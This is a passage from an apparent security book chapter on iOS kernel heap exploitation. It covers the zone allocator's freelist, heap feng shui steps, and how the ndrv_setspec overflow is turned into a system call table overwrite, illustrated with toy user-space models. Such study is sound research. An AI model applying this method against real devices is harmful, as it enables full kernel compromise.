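The zone selection rule can be modelled with two lookup tables. This is a simplification that ignores the hand-off to kmem_alloc() for large sizes, and it assumes that the additional zone between 512 and 1024 bytes is the 768-byte zone (1.5 times 512). The table and function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* kalloc zone sizes as listed in the text. */
static const uint32_t ZONES_IOS4[] = {
    16, 32, 64, 128, 256, 512, 1024, 2048, 4096, 8192
};
static const uint32_t ZONES_IOS5[] = {
    16, 24, 32, 40, 48, 64, 88, 112, 128, 192, 256, 384, 512,
    768, 1024, 1536, 2048, 3072, 4096, 6144, 8192
};

/* Smallest zone that holds size bytes, or 0 if no zone is large enough. */
uint32_t smallest_zone(const uint32_t *zones, size_t n, uint32_t size)
{
    for (size_t i = 0; i < n; i++)
        if (zones[i] >= size)
            return zones[i];
    return 0;
}

uint32_t zone_for_ios4(uint32_t size)
{
    return smallest_zone(ZONES_IOS4,
                         sizeof ZONES_IOS4 / sizeof ZONES_IOS4[0], size);
}

uint32_t zone_for_ios5(uint32_t size)
{
    return smallest_zone(ZONES_IOS5,
                         sizeof ZONES_IOS5 / sizeof ZONES_IOS5[0], size);
}
```

For an exploit this matters because the same allocation size can land in different zones, and therefore next to different neighbors, depending on the iOS version.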

After digging through all these wrappers, you finally get to the heart of the zone allocator and can analyze its internal implementation. The allocator is called zone allocator because it organizes memory in zones. Within a zone, all memory blocks are of the same size. For most kernel objects there is even a dedicated zone that collects all memory blocks of the same structure type. Such zones include socket, tasks, vnodes, and kernel_stacks. Other general-purpose zones, like those registered by kalloc(), are called kalloc.16 to kalloc.8192. On iOS and Mac OS X you can retrieve a full list of zones with the /usr/bin/zprint tool. A zone is described by its zone structure:

struct zone {
   int count;                                 /* Number of elements used now */
   vm_offset_t free_elements;
   decl_lck_mtx_data(,lock)                                     /* zone lock */
   lck_mtx_ext_t lock_ext;                 /* placeholder for indirect mutex */
   lck_attr_t lock_attr;                              /* zone lock attribute */
   lck_grp_t lock_grp;                                    /* zone lock group */
   lck_grp_attr_t lock_grp_attr;                /* zone lock group attribute */
   vm_size_t cur_size;                         /* current memory utilization */
   vm_size_t max_size;                       /* how large can this zone grow */
   vm_size_t elem_size;                                /* size of an element */
   vm_size_t alloc_size;                        /* size used for more memory */
   uint64_t sum_count;                     /* count of allocs (life of zone) */
   unsigned int
   /* boolean_t */ exhaustible :1,            /* (F) merely return if empty? */
   /* boolean_t */ collectable :1,        /* (F) garbage collect empty pages */
   /* boolean_t */ expandable :1,         /* (T) expand zone (with message)? */
   /* boolean_t */ allows_foreign :1,          /* (F) allow non-zalloc space */
   /* boolean_t */ doing_alloc :1,                 /* is zone expanding now? */
   /* boolean_t */ waiting :1,           /* is thread waiting for expansion? */
   /* boolean_t */ async_pending :1,     /* asynchronous allocation pending? */
   /* boolean_t */ caller_acct: 1,    /* do we account alloc/free to caller? */
   /* boolean_t */ doing_gc :1,              /* garbage collect in progress? */
   /* boolean_t */ noencrypt :1;
   int index;                   /* index into zone_info arrays for this zone */
   struct zone   * next_zone;                     /* Link for all-zones list */
   call_entry_data_t call_async_alloc;     /* callout for asynchronous alloc */
   const char *zone_name;                             /* a name for the zone */
};

All zones are kept in a singly linked list, in which each zone points to its successor through the next_zone pointer. A zone keeps track of the number of currently allocated elements and the amount of currently assigned memory. It does not keep track of the addresses of the pages belonging to it. In addition to that, a number of fields contain the configuration of the zone: the size of elements, the maximum size of the zone, and the amount of memory by which the zone grows whenever it is full. A bitfield within the structure holds flags that configure, for example, whether the zone supports garbage collection, whether it is allowed to grow automatically, and whether it is exempt from encryption.

The free_elements pointer within the structure hints at the fact that all free elements of a zone are kept in a linked list. The connection pointer to the next element of the freelist is stored in the beginning of a free block. When memory is allocated, the first element of the freelist is reused and the head of the freelist is replaced by the next element. If the freelist is empty, the zone is enlarged. When a page is added to the zone or when the zone is initially created, the new memory blocks are put on the freelist one after another. Therefore, the freelist contains the memory blocks of a page in reverse order.
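The freelist behavior described here is easy to reproduce in user space. The following toy allocator is a sketch and not the kernel implementation. The element size, the number of elements per page, and all names are chosen only for illustration.

```c
#include <stddef.h>
#include <stdint.h>

#define TOY_ELEM_SIZE      64u
#define TOY_ELEMS_PER_PAGE 4u

struct toy_zone {
    void *free_elements; /* head of the freelist, NULL if empty */
};

/* Put an element on the freelist. The link to the previous head is stored
 * in the first word of the freed element itself. */
void toy_zfree(struct toy_zone *z, void *elem)
{
    *(void **)elem = z->free_elements;
    z->free_elements = elem;
}

/* Add one page to the zone, pushing its elements lowest address first.
 * page must be suitably aligned for storing a pointer. */
void toy_add_page(struct toy_zone *z, uint8_t *page)
{
    for (size_t i = 0; i < TOY_ELEMS_PER_PAGE; i++)
        toy_zfree(z, page + i * TOY_ELEM_SIZE);
}

/* Take the head of the freelist; the stored link becomes the new head. */
void *toy_zalloc(struct toy_zone *z)
{
    void *elem = z->free_elements;
    if (elem != NULL)
        z->free_elements = *(void **)elem;
    return elem;
}
```

After toy_add_page(), successive calls to toy_zalloc() return the element with the highest address first and the one with the lowest address last, which is the reverse order mentioned above.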

When zalloc() is used to allocate an element, it is taken from the freelist by using the REMOVE_FROM_ZONE macro. This macro reads the pointer to the next element of the freelist from the start of the free block, sets it as the new head of the freelist, and returns the previous head of the freelist as the allocated block:

#define REMOVE_FROM_ZONE(zone, ret, type)                                      \
MACRO_BEGIN                                                                    \
   (ret) = (type) (zone)->free_elements;                                       \
   if ((ret) != (type) 0) {                                                    \
      if (check_freed_element) {                                               \
         if (!is_kernel_data_addr(((vm_offset_t *)(ret))[0]) ||                \
                           ((zone)->elem_size >= (2 * sizeof(vm_offset_t)) &&  \
             ((vm_offset_t *)(ret))[((zone)->elem_size/sizeof(vm_offset_t))-1] \
                  != ((vm_offset_t *)(ret))[0]))                               \
            panic("a freed zone element has been modified");                   \
         if (zfree_clear) {                                                    \
            unsigned int ii;                                                   \
            for (ii = sizeof(vm_offset_t) / sizeof(uint32_t);                  \
                 ii < (zone)->elem_size/sizeof(uint32_t)                       \
                 - sizeof(vm_offset_t) / sizeof(uint32_t); ii++)               \
            if (((uint32_t *)(ret))[ii] != (uint32_t)0xdeadbeef)               \
               panic("a freed zone element has been modified");                \
         }                                                                     \
      }                                                                        \
      (zone)->count++;                                                         \
      (zone)->sum_count++;                                                     \
      (zone)->free_elements = *((vm_offset_t *)(ret));                         \
   }                                                                           \
MACRO_END

The majority of the macro performs checks of the free element and the freelist. These checks are meant to detect kernel heap corruption, but are conditionally executed and not activated by default. To activate them, the iOS kernel must be booted with the special boot arguments -zc and -zp. From the latest source code of Mac OS X Lion, it seems that Apple was experimenting with activating these features by default. For now they are still deactivated, which is most probably due to performance reasons.

Because there are no activated security checks in an iOS kernel by default and because the freelist is stored in-band, that is, inside the free blocks themselves, the exploitation of heap overflows within the iOS kernel is very similar to exploitation on other platforms from many years ago. By overflowing the end of an allocated block into an adjacent free block, it is possible to overwrite and therefore replace the pointer to the next element in the freelist. When the overwritten free block later becomes the head of the freelist, the next invocation of zalloc() returns it and makes the overwritten pointer the new head of the freelist. The allocation that follows therefore returns an attacker-supplied pointer. Because this pointer can point anywhere in memory, this can lead to arbitrary memory overwrites, depending on how the kernel code uses the returned memory. In the public exploit for the ndrv vulnerability this is used to overwrite the system call handler 207, which allows arbitrary kernel code execution.
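The effect of an overwritten freelist pointer can be demonstrated with a harmless user space model. Everything in this sketch is hypothetical: the mini_ names, the element size, and the unchecked copy that stands in for a vulnerable kernel function. It assumes that the two elements lie directly next to each other in one array.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MINI_ELEM_SIZE 32u

struct mini_zone {
    void *free_elements; /* head of the in-band freelist */
};

void mini_free(struct mini_zone *z, void *elem)
{
    *(void **)elem = z->free_elements; /* link lives inside the free block */
    z->free_elements = elem;
}

void *mini_alloc(struct mini_zone *z)
{
    void *elem = z->free_elements;
    if (elem != NULL)
        z->free_elements = *(void **)elem;
    return elem;
}

/* Builds data that is one pointer longer than an element. The extra bytes
 * replace the freelist link of the block that follows in memory.
 * out must hold MINI_ELEM_SIZE + sizeof(void *) bytes. Returns the length. */
size_t mini_build_overflow(uint8_t *out, void *forged_next)
{
    memset(out, 'X', MINI_ELEM_SIZE);
    memcpy(out + MINI_ELEM_SIZE, &forged_next, sizeof forged_next);
    return MINI_ELEM_SIZE + sizeof forged_next;
}

/* Stand-in for the vulnerable copy: the length is never checked. */
void mini_vulnerable_copy(void *block, const uint8_t *src, size_t len)
{
    memcpy(block, src, len);
}
```

If two adjacent elements are free and the lower one is allocated and then overflowed with the data from mini_build_overflow(), the next call to mini_alloc() returns the upper element, and the call after that returns the forged pointer.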

Kernel Heap Feng Shui

Just like in user space heap exploitation, the biggest problem when exploiting a heap is that it is initially in an unknown state at the time of exploitation. This is bad, because successfully exploiting a heap overflow requires you to control the position of the overflowing block in relation to a free block that will be overwritten. To achieve this, several different techniques have been developed. Traditionally, heap spraying was used in heap overflow exploits to fill the heap with enough blocks, so that the probability of overwriting interesting blocks was very high. This was very unreliable and had to be improved. Therefore, a more sophisticated technique was developed, which allows for far more reliable exploits. This technique is now widely known as heap feng shui, and was discussed in Chapter 7.

Recall that this technique is a simple multi-step process that tries to bring a heap into an attacker-controlled state. To execute this process within a kernel exploit, you first need a way to allocate and deallocate memory blocks of arbitrary sizes from user space. This means you need to scan all the reachable kernel functionality for functions that allow you to allocate and free an attacker-supplied amount of memory. For the ndrv_setspec() vulnerability you can find these within the same file. The function ndrv_connect() is the handler that is called when an ndrv socket is connected. It allows you to allocate different amounts of kernel memory by supplying socket names of different lengths.

static int
ndrv_connect(struct socket *so, struct sockaddr *nam, __unused struct proc *p)
{
   struct ndrv_cb *np = sotondrvcb(so);

   if (np == 0)
      return EINVAL;

   if (np->nd_faddr)
      return EISCONN;
   
   /* Allocate memory to store the remote address */
   MALLOC(np->nd_faddr, struct sockaddr_ndrv*,
          nam->sa_len, M_IFADDR, M_WAITOK);
   if (np->nd_faddr == NULL)
      return ENOMEM;
   
   bcopy((caddr_t) nam, (caddr_t) np->nd_faddr, nam->sa_len);
   soisconnected(so);
   return 0;
}

The opposite operation, the deallocation from user space, is reachable by calling close() on the connected socket, to disconnect it again. This is implemented in the ndrv_do_disconnect() function:

static int
ndrv_do_disconnect(struct ndrv_cb *np)
{
   struct socket * so = np->nd_socket;
#if NDRV_DEBUG
   kprintf("NDRV disconnect: %x\n", np);
#endif
   if (np->nd_faddr)
   {
      FREE(np->nd_faddr, M_IFADDR);
      np->nd_faddr = 0;
   }
   if (so->so_state & SS_NOFDREF)
      ndrv_do_detach(np);
   soisdisconnected(so);
   return(0);
}

Now that you have established how to allocate and deallocate kernel memory from user space, you can use this for executing the heap feng shui technique. This technique assumes that you start with a heap in an unknown state, which basically means there are a number of allocated blocks and a number of empty holes of different sizes. Neither the position of the allocated blocks, nor the number of holes, is known. An exploit based on the heap feng shui technique then proceeds as follows:

1. Allocate enough memory blocks so that all “holes” get closed. The exact number of required allocations is usually unknown.
2. Allocate more memory blocks so that these will all be adjacent to each other in memory.
3. Free two adjacent memory blocks. The order depends on the freelist implementation. The next allocation should return the block that comes first in memory.
4. Trigger a vulnerable kernel function that will allocate the first of the two blocks and overflow into the following free block.
5. Trigger some kernel functionality that allocates the overwritten free block and makes the overwritten pointer the head of the freelist.
6. Trigger more functionality that will allocate memory, and therefore use the attacker-supplied pointer instead of a real memory block.
7. Use this arbitrary memory overwrite to overwrite some function pointer, like an unused handler in the system call table.
8. Trigger the overwritten system call to execute arbitrary code in kernel space.

Although the first step is based on a guessed number of allocations, exploits based on heap feng shui are usually very stable. However, within Mac OS X and iOS there exists a gift from kernel space that helps to remove this little uncertainty.

Detecting the State of the Kernel Heap

Both Mac OS X and iOS come with a very interesting and useful mach trap called host_zone_info(). This method can be used to query information about the state of all registered zones from the kernel's zone allocator. This function is not limited to the root user and is used, for example, internally by the /usr/bin/zprint utility that comes preinstalled with Mac OS X. For every zone, it returns information in the form of a filled out zone_info struct:

typedef struct zone_info {
   integer_t  zi_count;         /* Number of elements used now */
   vm_size_t  zi_cur_size;      /* current memory utilization */
   vm_size_t  zi_max_size;      /* how large can this zone grow */
   vm_size_t  zi_elem_size;     /* size of an element */
   vm_size_t  zi_alloc_size;    /* size used for more memory */
   integer_t  zi_pageable;      /* zone pageable? */
   integer_t  zi_sleepable;     /* sleep if empty? */
   integer_t  zi_exhaustible;   /* merely return if empty? */
   integer_t  zi_collectable;   /* garbage collect elements? */
} zone_info_t;

Although the information that can be retrieved through this mach trap does not leak any internal kernel memory addresses, it still allows a deep insight into the state of the kernel zone allocator. The field zi_count contains the number of currently allocated memory blocks in a zone. Because certain kernel structures are stored in their own zones, this counter might also allow you to deduce other information such as the number of running processes or open files.

For a kernel heap overflow, it is more interesting to subtract this value from the number of elements the zone can currently hold. This capacity is calculated by dividing the current size zi_cur_size by the size of a single element zi_elem_size. The difference is the number of free blocks in the zone, which is equal to the number of memory holes that need to be closed for the heap feng shui technique. In iOS and Mac OS X, it is therefore possible to calculate the exact number of necessary allocations that close all holes in a zone.
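The calculation can be written down in a few lines. The following is a small sketch that works on a local stand-in structure carrying only the three fields involved; the names toy_zone_info and zone_free_elements() are hypothetical, and the code does not itself query the kernel.

```c
#include <assert.h>
#include <stddef.h>

/* Local stand-in with only the zone_info fields used in the calculation. */
struct toy_zone_info {
    int    zi_count;      /* number of elements used now */
    size_t zi_cur_size;   /* current memory utilization */
    size_t zi_elem_size;  /* size of an element */
};

/* Number of free elements (holes) in a zone:
 *   capacity = zi_cur_size / zi_elem_size
 *   free     = capacity - zi_count
 * Returns 0 for inconsistent input instead of underflowing. */
static size_t zone_free_elements(const struct toy_zone_info *zi)
{
    size_t capacity;

    if (zi->zi_elem_size == 0 || zi->zi_count < 0)
        return 0;
    capacity = zi->zi_cur_size / zi->zi_elem_size;
    if ((size_t)zi->zi_count > capacity)
        return 0;
    return capacity - (size_t)zi->zi_count;
}
```

For example, a zone with a current size of 8192 bytes and 64-byte elements can hold 128 elements; if 100 of them are in use, 28 holes remain to be closed.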

When the maximum number of elements within a zone is exhausted, the zone is grown by adding a new block of zi_alloc_size bytes. This freshly allocated memory block is then divided into the separate memory blocks and each is put into the zone's freelist. This is important because the freelist is last-in, first-out, so the blocks are later handed out in the reverse of the order in which they were added. It also means that only memory blocks that were added within the same grow operation will be adjacent to each other in the zone.
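The reversal is easy to see in a user space model. The following sketch assumes that a fresh block is carved from the lowest to the highest address and that each element is pushed onto a last-in, first-out freelist; grow_zone, grow_push(), grow_pop(), grow_carve(), and grow_is_reversed() are hypothetical names, and the sizes are arbitrary.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define GROW_ELEM_SIZE  64    /* assumed element size */
#define GROW_ALLOC_SIZE 256   /* assumed size of one grow operation */

struct grow_zone {
    void *free_head;
};

/* Push an element onto the freelist, storing the old head inband. */
static void grow_push(struct grow_zone *z, void *elem)
{
    memcpy(elem, &z->free_head, sizeof(void *));
    z->free_head = elem;
}

/* Pop the current head of the freelist, or NULL if it is empty. */
static void *grow_pop(struct grow_zone *z)
{
    void *elem = z->free_head;
    if (elem != NULL)
        memcpy(&z->free_head, elem, sizeof(void *));
    return elem;
}

/* Carve a fresh block into elements, lowest address first. */
static void grow_carve(struct grow_zone *z, unsigned char *block,
                       size_t alloc_size, size_t elem_size)
{
    size_t off;
    for (off = 0; off + elem_size <= alloc_size; off += elem_size)
        grow_push(z, block + off);
}

/* Returns 1 if allocations come back in descending address order,
 * each exactly one element below the previous one. */
static int grow_is_reversed(void)
{
    static unsigned char block[GROW_ALLOC_SIZE];
    struct grow_zone z = { NULL };
    unsigned char *prev, *cur;

    grow_carve(&z, block, GROW_ALLOC_SIZE, GROW_ELEM_SIZE);

    prev = grow_pop(&z);
    if (prev != block + GROW_ALLOC_SIZE - GROW_ELEM_SIZE)
        return 0;                 /* first allocation is the highest element */
    while ((cur = grow_pop(&z)) != NULL) {
        if (cur + GROW_ELEM_SIZE != prev)
            return 0;             /* not adjacent or not descending */
        prev = cur;
    }
    return prev == block;         /* last allocation is the lowest element */
}
```

Under these assumptions, consecutive allocations from a freshly grown zone are adjacent in memory but come back from the highest address to the lowest, which is what determines the order in which blocks have to be freed during heap feng shui.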

Exploiting the Kernel Heap Buffer Overflow

Now that you know the theory behind kernel heap buffer overflow exploitation, it is time to get back to the example vulnerability and explain its exploitation. You have to remember that the actual heap-based buffer overflow is caused by repeatedly calling the ndrv_to_ifnet_demux() function until you overflow the actual buffer and exit the loop by triggering one of the internal error conditions:

int
ndrv_to_ifnet_demux(struct ndrv_demux_desc* ndrv,
                    struct ifnet_demux_desc* ifdemux)
{
    bzero(ifdemux, sizeof(*ifdemux));
   
    if (ndrv->type < DLIL_DESC_ETYPE2)
    {
        /* using old "type", not supported */
        return ENOTSUP;
    }
   
    if (ndrv->length > 28)
    {
        return EINVAL;
    }
   
    ifdemux->type = ndrv->type;
    ifdemux->data = ndrv->data.other;
    ifdemux->datalen = ndrv->length;
   
    return 0;
}

This function takes an ndrv_demux_desc structure from user space and converts it into an ifnet_demux_desc structure for kernel space. These structures are defined as follows:

struct ndrv_demux_desc
{
    u_int16_t   type;
    u_int16_t   length;
    union
    {
        u_int16_t   ether_type;
        u_int8_t    sap[3];
        u_int8_t    snap[5];
        u_int8_t    other[28];
    } data;
};
struct ifnet_demux_desc {
    u_int32_t   type;
    void        *data;
    u_int32_t   datalen;
};

The definition of these structures shows that you are limited in what you can write to the overflowing buffer. The type field can be filled only with 16-bit values greater than or equal to DLIL_DESC_ETYPE2, which is defined as 4. The datalen field can only be smaller than 29, and the data field will be a pointer into the structure copied from user space. This is quite limited, but your goal is to overwrite a pointer to the next element of the freelist. You can therefore construct the exploit in such a way that the data pointer within an ifnet_demux_desc structure overwrites the address of the next block in the freelist. This means that once the free block becomes the head of the freelist, the next allocation returns a memory block that is within the structure copied from user space. Because you control the content of that memory, you also control the first four bytes, which are assumed to be a pointer to the next block in the freelist. Therefore, you control the new head of the freelist. You let it be an address inside the system call table. The next allocation then returns the address inside the system call table. You make the kernel fill it with data you control. This results in arbitrary kernel code execution, after you call the overwritten system call handler.
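The constraints on the written values can be checked with a user space copy of the conversion routine. The sketch below reuses the structure layouts and the logic of ndrv_to_ifnet_demux() shown above, with uint16_t and similar types substituted for portability; toy_ndrv_to_ifnet_demux() and data_points_into_source() are hypothetical names. Note that on a 64-bit host the data pointer is eight bytes wide, whereas the text above assumes a 32-bit kernel with four-byte pointers.

```c
#include <assert.h>
#include <errno.h>
#include <stdint.h>
#include <string.h>

#define DLIL_DESC_ETYPE2 4   /* value as stated in the text */

struct ndrv_demux_desc {
    uint16_t type;
    uint16_t length;
    union {
        uint16_t ether_type;
        uint8_t  sap[3];
        uint8_t  snap[5];
        uint8_t  other[28];
    } data;
};

struct ifnet_demux_desc {
    uint32_t  type;
    void     *data;
    uint32_t  datalen;
};

/* User space copy of the conversion logic, for experimentation only. */
static int toy_ndrv_to_ifnet_demux(struct ndrv_demux_desc *ndrv,
                                   struct ifnet_demux_desc *ifdemux)
{
    memset(ifdemux, 0, sizeof(*ifdemux));

    if (ndrv->type < DLIL_DESC_ETYPE2)
        return ENOTSUP;          /* old "type", not supported */
    if (ndrv->length > 28)
        return EINVAL;

    ifdemux->type = ndrv->type;
    ifdemux->data = ndrv->data.other;   /* pointer into the source struct */
    ifdemux->datalen = ndrv->length;
    return 0;
}

/* Returns 1 if a successful conversion leaves the data field pointing
 * at bytes inside the source descriptor. */
static int data_points_into_source(struct ndrv_demux_desc *src)
{
    struct ifnet_demux_desc out;
    const unsigned char *lo = (const unsigned char *)src;
    const unsigned char *hi = lo + sizeof(*src);
    const unsigned char *p;

    if (toy_ndrv_to_ifnet_demux(src, &out) != 0)
        return 0;
    p = (const unsigned char *)out.data;
    return p >= lo && p < hi;
}
```

The only field whose value is not tightly bounded is data, and it always references the caller-supplied descriptor. That is why the exploit needs the extra allocation step described next.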

Because you are limited in what you can write, the exploit is a bit more complicated than a normal heap-based buffer overflow. However, because you can write a pointer to data you control, you just have to add an additional step so that you control the head of the freelist after two, instead of one, allocations. The full source code of this exploit, including a kernel patch that forward-ports this vulnerability into current kernels for experimentation purposes, is available at http://github.com/stefanesser/ndrv_setspec.

Summary

In this chapter, you stepped into the kernel space of iOS for the first time within this book. We covered different topics about kernel exploit development, from extracting and decrypting the kernel binary to achieving arbitrary code execution at kernel level.

We introduced you to reversing IOKit kernel drivers contained within the kernel binary and discussed how to find interesting kernel code that should be audited for vulnerabilities. We showed you how the iOS kernel can be remotely debugged with another computer and the KDP protocol, for easier kernel exploit development.

We also walked you through the exploitation of different types of kernel vulnerabilities, including the exploitation of arbitrary memory overwrites, uninitialized kernel variables, stack-based buffer overflows, and finally, heap-based buffer overflows inside kernel space.

Finally, we discussed the implementation and exploitation of the kernel's zone heap allocator and demonstrated how the heap feng shui technique is used in kernel-level heap buffer overflow exploits.
